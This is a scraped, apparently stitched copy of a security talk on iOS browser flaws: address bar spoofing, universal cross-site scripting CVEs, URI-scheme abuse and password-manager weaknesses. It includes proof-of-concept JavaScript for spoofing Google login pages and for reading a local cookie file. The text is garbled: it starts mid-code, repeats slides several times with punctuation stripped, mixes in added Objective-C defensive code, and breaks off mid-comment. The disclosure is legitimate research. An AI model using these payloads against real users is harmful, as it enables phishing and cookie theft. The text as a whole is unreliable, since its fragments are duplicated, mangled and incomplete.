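    NSNumber *port = url.port ?: ([scheme isEqualToString:@"https"] ? @443 : @80);
    return [NSString stringWithFormat:@"%@://%@:%@", scheme, url.host.lowercaseString, port];
}

@interface PasswordManagerPolicy : NSObject
@property (nonatomic, strong) NSMutableDictionary *store;   // key -> credential dictionary
@end

@implementation PasswordManagerPolicy

- (instancetype)init {
    if ((self = [super init])) _store = [NSMutableDictionary dictionary];
    return self;
}

// Called when the injected form-capture script reports a submission. Any origin the
// script claims is ignored; the page that actually owns the top frame is used, and a
// save for another domain therefore cannot be forced from content.
- (BOOL)saveCredential:(NSDictionary *)credential
           fromWebView:(UIWebView *)webView
         userConfirmed:(BOOL)confirmed {
    NSString *key = CredentialKeyForURL(webView.request.mainDocumentURL);
    if (!key || !confirmed) return NO;                 // no silent saves
    if (![key hasPrefix:@"https://"]) return NO;       // assumed policy: https credentials only
    self.store[key] = credential;
    return YES;
}

// Called before the fill script is injected. stringByEvaluatingJavaScriptFromString runs
// in the top document only, so the fill never reaches a subframe; the lookup is still an
// exact scheme+host+port match, so an http page never receives an https credential.
- (NSDictionary *)credentialToFillForWebView:(UIWebView *)webView {
    NSURL *top = webView.request.mainDocumentURL;
    NSString *key = CredentialKeyForURL(top);
    if (!key || ![top.scheme.lowercaseString isEqualToString:@"https"]) return nil;
    return self.store[key];
}
@end
```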
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most third-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec
• http://www.w3.org/TR/CSP
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews
• http://www.shmoo.com/idn
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com
• https://ios.browsr-tests.com
Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
![Page 17: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/17.jpg)
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 18: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/18.jpg)
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing: Loading loop
• HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt, even before an actual connection is made
• Now we only need to find a target with filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443/'; setInterval(function() { location = 'https://accounts.google.com:8443/' }, …)
Address Bar Spoofing: Title bar
Phishing page: <title>https://www.apple.com/</title>

Address bar tips
• Display the URL that is currently loaded within UIWebView, not the one you think will be there
• UIWebViewDelegate: update address bar on each event, including webView:didFailLoadWithError:
• Displaying SSL lock makes sense if there was an actual successful and valid SSL connection. Spoofing https URL seems easy, don’t make it worse by automatically adding SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
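The four tips above in one place, as an added example that is not the presentation's code: a hypothetical AddressBarController re-reads the URL UIWebView actually holds on every delegate callback (didFailLoadWithError: included), shows the lock only after a finished https load, and on iOS 8 observes WKWebView's KVO-compliant URL, loading and hasOnlySecureContent properties instead.

```objective-c
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

// Hypothetical browser chrome (added example, not the presentation's code).
// The address bar is driven only by what the web view reports, never by the
// URL the app or the page asked to navigate to.
@interface AddressBarController : UIViewController <UIWebViewDelegate>
@property (nonatomic, strong) UILabel *addressLabel;
@property (nonatomic, strong) UIImageView *lockIcon;
@property (nonatomic, strong) WKWebView *observedWebView;   // iOS 8+ only
@end

static void *kWebViewObservationContext = &kWebViewObservationContext;
static NSString *const kObservedKeyPaths[] = { @"URL", @"loading", @"hasOnlySecureContent" };
#define kObservedKeyPathCount (sizeof(kObservedKeyPaths) / sizeof(kObservedKeyPaths[0]))

@implementation AddressBarController

// The single place that decides what the user sees. The lock is tied to a
// completed https load; a pending or failed navigation never shows one.
- (void)syncAddressBarWithURL:(NSURL *)url secureLoadFinished:(BOOL)secure {
    self.addressLabel.text = url.absoluteString ?: @"";
    self.lockIcon.hidden = !secure;
}

// UIWebView tracks the top frame through request.mainDocumentURL; request.URL
// may belong to a subframe if a frame load triggered the callback.
- (NSURL *)currentURLOfWebView:(UIWebView *)webView {
    return webView.request.mainDocumentURL ?: webView.request.URL;
}

- (BOOL)isHTTPS:(NSURL *)url {
    return [url.scheme caseInsensitiveCompare:@"https"] == NSOrderedSame;
}

#pragma mark - UIWebViewDelegate (iOS 7 and earlier)

- (void)webViewDidStartLoad:(UIWebView *)webView {
    // Navigation attempt: show what the view reports, but no lock yet.
    [self syncAddressBarWithURL:[self currentURLOfWebView:webView] secureLoadFinished:NO];
}

- (void)webViewDidFinishLoad:(UIWebView *)webView {
    // UIWebView rejects invalid certificates by default, so a finished https
    // load is the best signal it offers; mixed content is not visible here.
    NSURL *url = [self currentURLOfWebView:webView];
    [self syncAddressBarWithURL:url secureLoadFinished:[self isHTTPS:url]];
}

- (void)webView:(UIWebView *)webView didFailLoadWithError:(NSError *)error {
    // The slide's point: a failed navigation must also refresh the bar from the
    // view instead of leaving the attempted URL on screen. Cancelled loads are
    // treated the same way, so a stale URL can never linger.
    [self syncAddressBarWithURL:[self currentURLOfWebView:webView] secureLoadFinished:NO];
}

#pragma mark - WKWebView (iOS 8+)

- (void)observeWKWebView:(WKWebView *)webView {
    self.observedWebView = webView;
    // URL, loading and hasOnlySecureContent are KVO-compliant on WKWebView, so
    // the bar follows the engine's own state instead of the app's guess.
    for (NSUInteger i = 0; i < kObservedKeyPathCount; i++) {
        [webView addObserver:self forKeyPath:kObservedKeyPaths[i]
                     options:NSKeyValueObservingOptionNew context:kWebViewObservationContext];
    }
}

- (void)observeValueForKeyPath:(NSString *)keyPath ofObject:(id)object
                        change:(NSDictionary *)change context:(void *)context {
    if (context != kWebViewObservationContext) {
        [super observeValueForKeyPath:keyPath ofObject:object change:change context:context];
        return;
    }
    WKWebView *webView = object;
    // Lock only when the load has finished and every resource came over https.
    BOOL secure = !webView.loading && webView.hasOnlySecureContent && [self isHTTPS:webView.URL];
    [self syncAddressBarWithURL:webView.URL secureLoadFinished:secure];
}

- (void)dealloc {
    for (NSUInteger i = 0; i < kObservedKeyPathCount; i++) {
        [_observedWebView removeObserver:self forKeyPath:kObservedKeyPaths[i]
                                 context:kWebViewObservationContext];
    }
}

@end
```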
UXSS: Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website (~ http://en.wikipedia.org/wiki/Cross-site_scripting).
Famous after PDF UXSS in 2007
• CVE-2013-6893 UXSS in Mercury Browser for iOS
• CVE-2013-7197 UXSS in Yandex.Browser for iOS
• CVE-2012-2899 UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser
w = window.open('about:blank')
  -> mbexec://$(WINDOW_ID)/[{ "command": "window.open", "target": 1234, "url": "about:blank" }]   (target: Math.random())
  -> [webView loadRequest: … "about:blank" …]   (cross-frame forgery)
w.document.write('Hi')
  -> mbexec://$(WINDOW_ID)/[{ "command": "window.document.write", "target": 1234, "html": "Hi" }]
  -> [webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com/'); w.document.write('<script src=…></script>') … and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect child window after window.open() -> UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of “no URL”, right?
• [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file:// - no same-origin policy, access to any web origin and local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use WKWebView UIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:

Other potential paths to applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com…"] —> nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com…"), NULL) —> NULL
• Downloads opened directly from file://
Content-Disposition: attachment
• displayed in the origin of hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain -> HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream -> HTML
• application/other, filename .html
JS without Same-Origin-Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
path = path + '/Library/Cookies/Cookies.binarycookies';
x = new XMLHttpRequest(); x.open('GET', path, false); x.send();
alert(x.responseText);
</script>

<script>x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send(); alert(x.responseText)</script>

Challenge: Hijack password autofill
Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header: HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView.configuration.preferences.javaScriptEnabled = false
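One way to implement both the safe cross-tab document.write from the earlier slide and the options listed here, as an added example that is not the presentation's code; TabManager, DownloadViewer and AboutBlank() are hypothetical names, and the CSP sandbox option is left out because it needs a response header rather than a web view call.

```objective-c
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

// Added example, not the presentation's code. The rule shared by every method:
// a document whose bytes came from somewhere untrusted (another tab's
// document.write, a download) is never loaded with baseURL:nil (applewebdata://)
// or a file:// base; it gets about:blank, an isolated origin.
static NSURL *AboutBlank(void) {
    NSURL *blank = [NSURL URLWithString:@"about:blank"];
    NSCAssert(blank != nil, @"about:blank must parse; nil here would mean applewebdata://");
    return blank;
}

@interface TabManager : NSObject <WKUIDelegate>
@property (nonatomic, strong) NSMutableArray *tabs;
@end

@implementation TabManager
- (instancetype)init {
    if ((self = [super init])) _tabs = [NSMutableArray array];
    return self;
}

// UIWebView (pre iOS 8): the bridge behind w = window.open(...); w.document.write(html).
// Whatever URL the opener passed to window.open() is ignored as a base: the written
// markup lands in about:blank, so it runs in an isolated origin, not in the
// opener's and not in the origin of the URL that was requested.
- (UIWebView *)openTabWithWrittenHTML:(NSString *)html {
    UIWebView *tab = [[UIWebView alloc] initWithFrame:CGRectZero];
    [tab loadHTMLString:html baseURL:AboutBlank()];
    [self.tabs addObject:tab];
    return tab;
}

// WKWebView (iOS 8+): implement the UIDelegate hook the slide names and let WebKit
// create the child with the configuration it hands us. window.open() then returns a
// real window proxy and w.document.write() goes through WebKit's own same-origin
// checks on every call, not a one-time check at open.
- (WKWebView *)webView:(WKWebView *)webView
createWebViewWithConfiguration:(WKWebViewConfiguration *)configuration
   forNavigationAction:(WKNavigationAction *)navigationAction
        windowFeatures:(WKWindowFeatures *)windowFeatures {
    WKWebView *child = [[WKWebView alloc] initWithFrame:webView.bounds configuration:configuration];
    child.UIDelegate = self;
    [self.tabs addObject:child];
    return child;   // returning nil would cancel the popup instead
}
@end

@interface DownloadViewer : NSObject
@end

@implementation DownloadViewer
// Option 1: show the download as text/plain. Markup is displayed, not executed,
// and the about:blank base keeps it out of file:// even if the type were sniffed.
- (void)showAsPlainText:(NSData *)fileData inWebView:(UIWebView *)webView {
    [webView loadData:fileData MIMEType:@"text/plain" textEncodingName:@"utf-8" baseURL:AboutBlank()];
}

// Option 3: render as HTML, but never from the file:// path it was saved under.
- (void)showAsHTML:(NSData *)fileData inWebView:(UIWebView *)webView {
    NSString *html = [[NSString alloc] initWithData:fileData encoding:NSUTF8StringEncoding] ?: @"";
    [webView loadHTMLString:html baseURL:AboutBlank()];
}

// Option 4 (iOS 8+): a WKWebView whose preferences have JavaScript off. The flag
// lives on the configuration, so a dedicated one is built rather than flipping a
// shared configuration that other tabs use.
- (WKWebView *)makeNoScriptWebViewWithFrame:(CGRect)frame {
    WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
    config.preferences.javaScriptEnabled = NO;
    return [[WKWebView alloc] initWithFrame:frame configuration:config];
}

- (void)showDownload:(NSData *)fileData inNoScriptWebView:(WKWebView *)webView {
    NSString *html = [[NSString alloc] initWithData:fileData encoding:NSUTF8StringEncoding] ?: @"";
    [webView loadHTMLString:html baseURL:AboutBlank()];
}
@end
```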
Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing navigation was initiated by user
• <iframe src="googlechrome://example.com/"><iframe src="merc://example.com/"> etc. bypass all popup blockers anyway…
URI schemes (diagram): Native (WebKit), Application (bolted-on), Bridge (internal), Registered (external)
• scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>
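The guard that both the baseURL bullets earlier (NSURL URLWithString: —> nil, CFURLCreateWithString —> NULL) and this slide call for, as an added example that is not the presentation's code: ParsedURLOrNil, CopyPathIfValid and DecideNavigation are hypothetical helpers that treat a nil NSURL or NULL CFURLRef as a rejected input instead of passing it on to loadHTMLString:baseURL: or to another CFURL function.

```objective-c
#import <Foundation/Foundation.h>

// Added example, not the presentation's code. One failure mode, two sinks: a URL
// string that does not parse comes back as nil/NULL, and that value then reaches
// either loadHTMLString:baseURL: (applewebdata:// origin) or a CFURL function
// (NULL pointer dereference, as in the CFURLCopyPath crash on the next slide).

// Parses an untrusted string. Returns nil if Foundation rejects it or it has no
// scheme; the caller must treat nil as "do not navigate", never as "no base URL".
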